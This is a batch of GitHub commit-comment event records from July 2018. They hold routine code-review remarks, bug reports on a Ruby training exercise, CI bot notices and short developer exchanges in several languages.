{"id":"7916966686","type":"CommitCommentEvent","actor":{"login":"p3x-robot"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29591436,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T08:21:14Z","updated_at":"2018-07-04T08:21:14Z","author_association":"NONE","body":"@yuhhaurlin does it mean MU-MIMU is implemented finally? :1st_place_medal: "}},"created_at":"2018-07-04T08:21:14Z"}
{"id":"7916967909","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29591438,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-04T08:21:28Z","updated_at":"2018-07-04T08:21:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T08:21:28Z"}
{"id":"7916976025","type":"CommitCommentEvent","actor":{"login":"Holmqvist1990"},"repo":{"name":"Holmqvist1990/MOF"},"payload":{"comment":{"id":29591451,"position":null,"line":null,"path":null,"commit_id":"912f23c31a867550be33e7e4806841624c8e9098","created_at":"2018-07-04T08:23:10Z","updated_at":"2018-07-04T08:23:10Z","author_association":"OWNER","body":"Vad fan håller du på med"}},"created_at":"2018-07-04T08:23:10Z"}
{"id":"7916976430","type":"CommitCommentEvent","actor":{"login":"guyemerson"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29591452,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-04T08:23:14Z","updated_at":"2018-07-04T08:23:14Z","author_association":"CONTRIBUTOR","body":"If that's a bug in ACE, and no one using pydmrs is affected by it, then I don't think it's something we should worry about supporting.\r\n\r\nHowever, Mike makes a good point that we shouldn't just target the ERG.  If we look cross-linguistically, \"converting to lowercase\" becomes tricky -- e.g. with Turkish, converting \"I\" to \"i\" [gives the wrong letter](https://en.wikipedia.org/wiki/Dotted_and_dotless_I).  A relatively simple option would be to add a parameter to the function so the user can switch off conversion to lowercase."}},"created_at":"2018-07-04T08:23:14Z"}
{"id":"7917001409","type":"CommitCommentEvent","actor":{"login":"lamps-daq"},"repo":{"name":"lamps-daq/vme_lamps"},"payload":{"comment":{"id":29591504,"position":null,"line":null,"path":null,"commit_id":"513ce3a940a7f34f4e92b6a0a8401b102b8aada3","created_at":"2018-07-04T08:28:23Z","updated_at":"2018-07-04T08:28:23Z","author_association":"OWNER","body":"Parameter Naming within **Edit Setup** now supports more complex name types. e.g. Det1Par1-16"}},"created_at":"2018-07-04T08:28:23Z"}
{"id":"7917001911","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29591507,"position":24,"line":213,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-04T08:28:29Z","updated_at":"2018-07-04T08:28:29Z","author_association":"NONE","body":"Дастан, дело в том, что тебе уже Влад на эту же ошибку указывал и объяснял в чем ее суть\r\nя пошел дальше и написал тебе уже готовый код\r\nтвой ответ:\r\n\r\n> работает так, но я этого не знал спасибо!\r\n\r\nон означает, что ты не разобрался с темой, потому что это очень простой момент:\r\n- у тебя есть класс `Train`\r\n- в классе есть методы, в частности метод `remove_wagon`\r\n- есть объект этого класса - `train`\r\n- у этого объекта кончено же можно вызывать методы, описанные в классе, в том числе можно вызвать у этого объекта метод `remove_wagon`, т.е. записать `train.remove_wagon(wagon)`\r\n\r\nсобственно все это разбиралось на предыдущем уроке - это основы ООП\r\nя опасаюсь, что тебе будет дальше очень трудно продвигаться, если ты сейчас не разберешься в этих основах\r\nмне в голову приходит следующий вариант, конечно полностью по твоему желанию:\r\n\r\n- вернись к предыдущему уроку: перечитай материалы, пересмотри скринкаст\r\n- попробуй написать задание заново, не подглядывая никуда, в том числе в тот код, который у тебя уже есть\r\n- можешь даже прислать получившийся вариант на проверку (заведи например новый репозиторий)\r\n- далее можно те же шаги проделать по текущему уроку (чтение, скринкаст, код)\r\n\r\nеще раз повторюсь - это просто рекомендация, можешь поступать как тебе кажется правильным"}},"created_at":"2018-07-04T08:28:29Z"}
{"id":"7917002421","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29591509,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T08:28:34Z","updated_at":"2018-07-04T08:28:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T08:28:34Z"}
{"id":"7917004160","type":"CommitCommentEvent","actor":{"login":"p3x-robot"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29591512,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T08:28:53Z","updated_at":"2018-07-04T08:28:53Z","author_association":"NONE","body":"got it, thanks!!!!"}},"created_at":"2018-07-04T08:28:53Z"}
{"id":"7917005097","type":"CommitCommentEvent","actor":{"login":"guyemerson"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29591516,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-04T08:29:05Z","updated_at":"2018-07-04T08:29:05Z","author_association":"CONTRIBUTOR","body":"On second thought... the wiki does say that \"predicates are always case-insensitive\" -- http://moin.delph-in.net/PredicateRfc#Predicate_Equivalence\r\n\r\nSo I really am tempted to say we don't need to support upper case."}},"created_at":"2018-07-04T08:29:05Z"}
{"id":"7917007219","type":"CommitCommentEvent","actor":{"login":"rvanmil"},"repo":{"name":"dmtrKovalenko/material-ui-pickers"},"payload":{"comment":{"id":29591518,"position":null,"line":null,"path":null,"commit_id":"c02a0f2f68a3c463b3b271378dd80e522363bc72","created_at":"2018-07-04T08:29:30Z","updated_at":"2018-07-04T08:29:30Z","author_association":"NONE","body":"Would it be possible to release this fix asap? This issue currently breaks the `electron-builder` process."}},"created_at":"2018-07-04T08:29:30Z"}
{"id":"7917011078","type":"CommitCommentEvent","actor":{"login":"quangmydn"},"repo":{"name":"sysgears/apollo-universal-starter-kit"},"payload":{"comment":{"id":29591527,"position":null,"line":null,"path":null,"commit_id":"aa70af50ea26c7e9f3798078ffcb018c9a99a56e","created_at":"2018-07-04T08:30:17Z","updated_at":"2018-07-04T08:30:17Z","author_association":"NONE","body":"Thanks! Good Project!"}},"created_at":"2018-07-04T08:30:17Z"}
{"id":"7917013614","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29591529,"position":15,"line":15,"path":"include/vdipb.h","commit_id":"17dc5da5732a788155ca47efa733ff280afe0daf","created_at":"2018-07-04T08:30:45Z","updated_at":"2018-07-04T08:30:45Z","author_association":"OWNER","body":"Yes, i know, i only added it to make clear that the real layout will not be same as the m68k version."}},"created_at":"2018-07-04T08:30:45Z"}
{"id":"7917016237","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29591534,"position":null,"line":null,"path":null,"commit_id":"0ce9c028a29d756cf1f1c80b29b5b2b7f76b7043","created_at":"2018-07-04T08:31:17Z","updated_at":"2018-07-04T08:31:17Z","author_association":"NONE","body":"я попробовал запустить программу и переместить поезд по маршруту\r\nвот что получилось:\r\n```\r\n$ ruby main.rb \r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n7\r\n_________\r\n1\r\n2\r\nВведите номер поезда:\r\n1\r\nЭто первая станция\r\nНе возможно движение назат, так как это первая станция\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n```\r\nпочему программа сама решила, что я хочу двигаться назад?\r\nа вдруг я хочу вперед ?"}},"created_at":"2018-07-04T08:31:17Z"}
{"id":"7917017173","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29591536,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-04T08:31:29Z","updated_at":"2018-07-04T08:31:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T08:31:29Z"}
{"id":"7917021999","type":"CommitCommentEvent","actor":{"login":"jyotima6"},"repo":{"name":"jyotima6/test1.io"},"payload":{"comment":{"id":29591542,"position":null,"line":null,"path":null,"commit_id":"f7a488e908a5aca3c10e1fcd4d1ee6b42b273ef2","created_at":"2018-07-04T08:32:27Z","updated_at":"2018-07-04T08:32:27Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-04T08:32:27Z"}
{"id":"7917027071","type":"CommitCommentEvent","actor":{"login":"nashbridges"},"repo":{"name":"ua-books/ua-books"},"payload":{"comment":{"id":29591555,"position":null,"line":null,"path":null,"commit_id":"69d902cfc47666d2af5f810958f1f60e4d8b66c7","created_at":"2018-07-04T08:33:27Z","updated_at":"2018-07-04T08:33:27Z","author_association":"CONTRIBUTOR","body":"https://groups.google.com/forum/#!topic/rubyonrails-security/b__OeLG9bts\r\nhttps://groups.google.com/forum/#!topic/rubyonrails-security/tP7W3kLc5u4"}},"created_at":"2018-07-04T08:33:27Z"}
{"id":"7917029945","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwikisas/xwikisas-parent"},"payload":{"comment":{"id":29591559,"position":7,"line":53,"path":"xwikisas-parent-platform-distribution/pom.xml","commit_id":"8bdbef7a4b630e695f0ccd87cd23529c9aacc128","created_at":"2018-07-04T08:34:01Z","updated_at":"2018-07-04T08:34:01Z","author_association":"COLLABORATOR","body":"This line exceeds the 120 characters limit. You can easily move the 'See' on a new line. And don't use the URL to the master branch (or any branch) as it can very quickly become obsolete. You should target a tag instead which doesn't change."}},"created_at":"2018-07-04T08:34:01Z"}
{"id":"7917031245","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwikisas/xwikisas-parent"},"payload":{"comment":{"id":29591562,"position":7,"line":53,"path":"xwikisas-parent-platform/pom.xml","commit_id":"8bdbef7a4b630e695f0ccd87cd23529c9aacc128","created_at":"2018-07-04T08:34:17Z","updated_at":"2018-07-04T08:34:17Z","author_association":"COLLABORATOR","body":"Same here."}},"created_at":"2018-07-04T08:34:17Z"}
{"id":"7917036356","type":"CommitCommentEvent","actor":{"login":"Toxantron"},"repo":{"name":"Demian87/scrumonline"},"payload":{"comment":{"id":29591566,"position":null,"line":null,"path":null,"commit_id":"b7281411f540d32536445c16f4d934bcd55cdfae","created_at":"2018-07-04T08:35:20Z","updated_at":"2018-07-04T08:35:20Z","author_association":"NONE","body":"Having an optional URL for a poll is a nice addition, I think I will include this commit."}},"created_at":"2018-07-04T08:35:20Z"}
{"id":"7917039284","type":"CommitCommentEvent","actor":{"login":"akoshlatyy-vareger"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29591576,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-04T08:35:55Z","updated_at":"2018-07-04T08:35:55Z","author_association":"NONE","body":"I already changed \r\n`tls = \"off\"`\r\nto\r\n`tlsservertrust = \"insecure-no-validation\"`\r\n`tlsclienttrust = \"insecure-no-validation\"`\r\nand constellation node generated Self-Signed certificates automatically and everything is working well.\r\nBut for using real certificates with parameters:\r\n`tlsservertrust = \"ca\"`\r\n`tlsclienttrust = \"ca\"`\r\nand with right certs:\r\n`tlsservercert = \"/etc/letsencrypt/live/example.com/cert.pem\"`\r\n`tlsserverkey = \"/etc/letsencrypt/live/example.com/privkey.pem\"`\r\nwe need to put the real DNS `example.com` that has tlsservercert & tlsserverkey on the \r\n`Please enter IP Address of this node: ` setup step.\r\nBut it's impossible, because of `Fatal: Option nat: invalid IP address`.\r\nCould you help me to change it and add possibilities to put real DNS instead of IP on the `Please enter IP Address of this node: ` setup step?"}},"created_at":"2018-07-04T08:35:55Z"}
{"id":"7917042412","type":"CommitCommentEvent","actor":{"login":"gregchung"},"repo":{"name":"gregchung/PapersBot"},"payload":{"comment":{"id":29591582,"position":5,"line":198,"path":"papersbot.py","commit_id":"b5d684164e0801d6b4e9e32c1639769bb59ffcb3","created_at":"2018-07-04T08:36:34Z","updated_at":"2018-07-04T08:36:34Z","author_association":"OWNER","body":"I was not able to tweet the f-strings with the python version that I am running the bot (Python 3.6.3).\r\n"}},"created_at":"2018-07-04T08:36:34Z"}
{"id":"7917044137","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29591585,"position":null,"line":null,"path":null,"commit_id":"0ce9c028a29d756cf1f1c80b29b5b2b7f76b7043","created_at":"2018-07-04T08:36:55Z","updated_at":"2018-07-04T08:36:55Z","author_association":"NONE","body":"вот еще интересный момент:\r\n```\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n6\r\n_________\r\n1\r\n2\r\nВведите номер ПОЕЗДА:\r\n2\r\nВведите номер ВАГОНА:\r\n002\r\nВагон успешно отцеплен\r\n```\r\nтолько у поезда нет вагона с таким номером... я не добавлял\r\n"}},"created_at":"2018-07-04T08:36:55Z"}
{"id":"7917048490","type":"CommitCommentEvent","actor":{"login":"jhavishal10"},"repo":{"name":"jhavishal10/Leetcode"},"payload":{"comment":{"id":29591595,"position":null,"line":null,"path":null,"commit_id":"11d7d42600f0e277514a0151b637a58cc257bbe1","created_at":"2018-07-04T08:37:46Z","updated_at":"2018-07-04T08:37:46Z","author_association":"OWNER","body":"i upload this to save my codes\r\n"}},"created_at":"2018-07-04T08:37:46Z"}
{"id":"7917050071","type":"CommitCommentEvent","actor":{"login":"Embraser01"},"repo":{"name":"K-Fet/K-App"},"payload":{"comment":{"id":29591598,"position":43,"line":41,"path":"client/src/app/_services/auth.service.ts","commit_id":"c8f0a07a7e92811a8616baa4b57631b40f13291b","created_at":"2018-07-04T08:38:06Z","updated_at":"2018-07-04T08:38:06Z","author_association":"MEMBER","body":"What is this `30`? "}},"created_at":"2018-07-04T08:38:06Z"}
{"id":"7917050573","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29591599,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-04T08:38:11Z","updated_at":"2018-07-04T08:38:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T08:38:11Z"}
{"id":"7917052701","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29591600,"position":null,"line":null,"path":null,"commit_id":"0ce9c028a29d756cf1f1c80b29b5b2b7f76b7043","created_at":"2018-07-04T08:38:35Z","updated_at":"2018-07-04T08:38:35Z","author_association":"NONE","body":"вот такая еще ошибка:\r\n```\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n6\r\n_________\r\n1\r\n2\r\nВведите номер ПОЕЗДА:\r\n123\r\nTraceback (most recent call last):\r\n\t6: from main.rb:24:in `<main>'\r\n\t5: from .../lesson4/interface.rb:32:in `run'\r\n\t4: from .../lesson4/interface.rb:39:in `menu'\r\n\t3: from .../lesson4/interface.rb:39:in `loop'\r\n\t2: from .../lesson4/interface.rb:58:in `block in menu'\r\n\t1: from .../lesson4/interface.rb:209:in `remove_wagon_from_train'\r\n.../lesson4/interface.rb:201:in `train_wagons_with_numbers': undefined method `wagons' for nil:NilClass (NoMethodError)\r\n```"}},"created_at":"2018-07-04T08:38:35Z"}
{"id":"7917057368","type":"CommitCommentEvent","actor":{"login":"Embraser01"},"repo":{"name":"K-Fet/K-App"},"payload":{"comment":{"id":29591606,"position":13,"line":24,"path":"server/app/controllers/auth-controller.js","commit_id":"c8f0a07a7e92811a8616baa4b57631b40f13291b","created_at":"2018-07-04T08:39:32Z","updated_at":"2018-07-04T08:39:32Z","author_association":"MEMBER","body":"Use a default value with destructuring: `const { username, password, rememberMe = 1 } = req.body`"}},"created_at":"2018-07-04T08:39:32Z"}
{"id":"7917058522","type":"CommitCommentEvent","actor":{"login":"leon1995"},"repo":{"name":"nknappe/jodel_api"},"payload":{"comment":{"id":29591608,"position":null,"line":null,"path":null,"commit_id":"e14d3ce6744fdfc1586e14bdba5c66dec4f1d959","created_at":"2018-07-04T08:39:46Z","updated_at":"2018-07-04T08:39:46Z","author_association":"NONE","body":"Hi.\r\nIm trying to find the new secret key, because this version is already outdatet. Can you tell me, how do you find the key?\r\nBest Regards"}},"created_at":"2018-07-04T08:39:46Z"}
{"id":"7917073711","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29591632,"position":null,"line":null,"path":null,"commit_id":"64490be2b31c396894ea4f1105bb8d4d7ddf2a4a","created_at":"2018-07-04T08:42:43Z","updated_at":"2018-07-04T08:42:43Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-236](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-236).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-236-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-04T08:42:43Z"}
{"id":"7917073967","type":"CommitCommentEvent","actor":{"login":"soandend"},"repo":{"name":"soandend/1"},"payload":{"comment":{"id":29591634,"position":null,"line":null,"path":null,"commit_id":"241b844f56968d63177e5fe33e469c1e634b1dfc","created_at":"2018-07-04T08:42:47Z","updated_at":"2018-07-04T08:42:47Z","author_association":"OWNER","body":"\r\n[初始化的版本库.txt](https://github.com/soandend/1/files/2162444/default.txt)\r\n"}},"created_at":"2018-07-04T08:42:47Z"}
{"id":"7917074841","type":"CommitCommentEvent","actor":{"login":"soandend"},"repo":{"name":"soandend/1"},"payload":{"comment":{"id":29591637,"position":null,"line":null,"path":null,"commit_id":"241b844f56968d63177e5fe33e469c1e634b1dfc","created_at":"2018-07-04T08:42:57Z","updated_at":"2018-07-04T08:42:57Z","author_association":"OWNER","body":"哼哼\r\n"}},"created_at":"2018-07-04T08:42:57Z"}
{"id":"7917076569","type":"CommitCommentEvent","actor":{"login":"ybhgenius"},"repo":{"name":"tronprotocol/wallet-cli"},"payload":{"comment":{"id":29591640,"position":null,"line":null,"path":null,"commit_id":"fdd38f9e8b8dc37c36ded79df68778f264dc5a08","created_at":"2018-07-04T08:43:17Z","updated_at":"2018-07-04T08:43:17Z","author_association":"MEMBER","body":"Could you leave me your tron wallet address for reward sending and email address for contact? My email address is yangboheng@tron.network.\r\n"}},"created_at":"2018-07-04T08:43:17Z"}
{"id":"7917078774","type":"CommitCommentEvent","actor":{"login":"rzr"},"repo":{"name":"mozilla-iot/webthing-node"},"payload":{"comment":{"id":29591644,"position":15,"line":27,"path":"lib/thing.js","commit_id":"82d5266393fac2eedc6f44356ae0868b8640a166","created_at":"2018-07-04T08:43:42Z","updated_at":"2018-07-04T08:43:42Z","author_association":"CONTRIBUTOR","body":"https://iot.mozilla.org/schemas is offline is that expected ?\r\n"}},"created_at":"2018-07-04T08:43:42Z"}
{"id":"7917080928","type":"CommitCommentEvent","actor":{"login":"zxb5116"},"repo":{"name":"zxb5116/TestGit"},"payload":{"comment":{"id":29591649,"position":null,"line":null,"path":null,"commit_id":"52c61eca01e037b48fcf6b00178369f0f67e8be7","created_at":"2018-07-04T08:44:06Z","updated_at":"2018-07-04T08:44:06Z","author_association":"OWNER","body":"1213"}},"created_at":"2018-07-04T08:44:06Z"}
{"id":"7917083887","type":"CommitCommentEvent","actor":{"login":"osallou"},"repo":{"name":"BioContainers/containers"},"payload":{"comment":{"id":29591654,"position":null,"line":null,"path":null,"commit_id":"91cd780fa3a02f70b08bbd8e4d05cf55f6d5572a","created_at":"2018-07-04T08:44:39Z","updated_at":"2018-07-04T08:44:39Z","author_association":"CONTRIBUTOR","body":"No peptimapper/2.0.0/test-cmds.txt (test file) present, skipping tests"}},"created_at":"2018-07-04T08:44:39Z"}
{"id":"7917083910","type":"CommitCommentEvent","actor":{"login":"ObserverOfTime"},"repo":{"name":"bb010g/betterdiscordctl"},"payload":{"comment":{"id":29591655,"position":32,"line":277,"path":"betterdiscordctl","commit_id":"d12d97df584098d00d5167291f10f255f9444bf9","created_at":"2018-07-04T08:44:39Z","updated_at":"2018-07-04T08:44:39Z","author_association":"COLLABORATOR","body":"I thought that `read` didn't have the `-d` flag on older versions of bash, but it seems that only `readarray` doesn't. I'll revert this part."}},"created_at":"2018-07-04T08:44:39Z"}
{"id":"7917084787","type":"CommitCommentEvent","actor":{"login":"rzr"},"repo":{"name":"mozilla-iot/webthing-node"},"payload":{"comment":{"id":29591657,"position":null,"line":null,"path":null,"commit_id":"82d5266393fac2eedc6f44356ae0868b8640a166","created_at":"2018-07-04T08:44:49Z","updated_at":"2018-07-04T08:44:49Z","author_association":"CONTRIBUTOR","body":"I guess model types are in some specs, it would help to have them linked from:\r\nhttps://iot.mozilla.org/schemas\r\nURL\r\n"}},"created_at":"2018-07-04T08:44:49Z"}
{"id":"7917087929","type":"CommitCommentEvent","actor":{"login":"jayfoad"},"repo":{"name":"Dyalog/ride"},"payload":{"comment":{"id":29591666,"position":null,"line":null,"path":null,"commit_id":"6fe45175aad022b961d6663647c3d91e9acca16c","created_at":"2018-07-04T08:45:23Z","updated_at":"2018-07-04T08:45:23Z","author_association":"CONTRIBUTOR","body":"If this is as uncontroversial as it looks, can you apply it to the ride4.1 branch please?"}},"created_at":"2018-07-04T08:45:23Z"}
{"id":"7917091249","type":"CommitCommentEvent","actor":{"login":"gavlyukovskiy"},"repo":{"name":"visyagin/BTreeClosestLeaf"},"payload":{"comment":{"id":29591673,"position":33,"line":33,"path":"src/com/visyagin/btree/entity/BinaryTree.java","commit_id":"9293e48115d579003ac976904cd3168a56b90325","created_at":"2018-07-04T08:46:01Z","updated_at":"2018-07-04T08:46:01Z","author_association":"NONE","body":"should we continue if newPath.size() >= resultPath.size()?"}},"created_at":"2018-07-04T08:46:01Z"}
{"id":"7917094822","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29591678,"position":null,"line":null,"path":null,"commit_id":"1cd2134e7e24589160d688e3009d7f65754ee3e3","created_at":"2018-07-04T08:46:42Z","updated_at":"2018-07-04T08:46:42Z","author_association":"COLLABORATOR","body":"Puzzle `79-aed0d144` discovered in   [`lib/zold/commands/pay.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/commands/pay.rb)   and submitted as #342. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-04T08:46:42Z"}
{"id":"7917107088","type":"CommitCommentEvent","actor":{"login":"IvanIvanoff"},"repo":{"name":"santiment/sanbase2"},"payload":{"comment":{"id":29591706,"position":6,"line":114,"path":"lib/sanbase_web/graphql/resolvers/project/project_resolver.ex","commit_id":"d90ea1331d11559be3c472dcf09ce7b95dc8bc7c","created_at":"2018-07-04T08:49:05Z","updated_at":"2018-07-04T08:49:05Z","author_association":"CONTRIBUTOR","body":"the second case covers the first one, too"}},"created_at":"2018-07-04T08:49:05Z"}
{"id":"7917109663","type":"CommitCommentEvent","actor":{"login":"olambdao"},"repo":{"name":"ground-x/web3.js"},"payload":{"comment":{"id":29591713,"position":17,"line":142,"path":"packages/web3-core-requestmanager/src/index.js","commit_id":"1e8760faeb41787fc8c1fa87a00fd942a52a3e29","created_at":"2018-07-04T08:49:33Z","updated_at":"2018-07-04T08:49:33Z","author_association":"NONE","body":"@nujabes403 @HappyShaker \r\n이런 케이스에서 주석을 어떻게 할까요? \r\n1. 질문 > 답변\r\n2. 삭제하고 필요한 주석만 남겨놓는다.\r\n\r\n어떤 방식으로 할까요?"}},"created_at":"2018-07-04T08:49:33Z"}
{"id":"7917111250","type":"CommitCommentEvent","actor":{"login":"olambdao"},"repo":{"name":"ground-x/web3.js"},"payload":{"comment":{"id":29591715,"position":17,"line":142,"path":"packages/web3-core-requestmanager/src/index.js","commit_id":"1e8760faeb41787fc8c1fa87a00fd942a52a3e29","created_at":"2018-07-04T08:49:52Z","updated_at":"2018-07-04T08:49:52Z","author_association":"NONE","body":"우선 저는 1. 질문 > 답변 형식으로 했습니다."}},"created_at":"2018-07-04T08:49:52Z"}
{"id":"7917114730","type":"CommitCommentEvent","actor":{"login":"Joseph-Moheb-2018"},"repo":{"name":"Joseph-Moheb-2018/ASUMobiCarG12"},"payload":{"comment":{"id":29591726,"position":null,"line":null,"path":null,"commit_id":"aff175a149c1bfb28f9d3cff6ac71ceed088ea94","created_at":"2018-07-04T08:50:33Z","updated_at":"2018-07-04T08:50:33Z","author_association":"OWNER","body":"Phase 1 "}},"created_at":"2018-07-04T08:50:33Z"}
{"id":"7917115686","type":"CommitCommentEvent","actor":{"login":"JohnFDavenport"},"repo":{"name":"alvarocavalcanti/hoverpy"},"payload":{"comment":{"id":29591728,"position":null,"line":null,"path":null,"commit_id":"7e8e136f16f681447a8d2c8d621eb868827b8572","created_at":"2018-07-04T08:50:44Z","updated_at":"2018-07-04T08:50:44Z","author_association":"NONE","body":"Could you submit a pull request?"}},"created_at":"2018-07-04T08:50:44Z"}
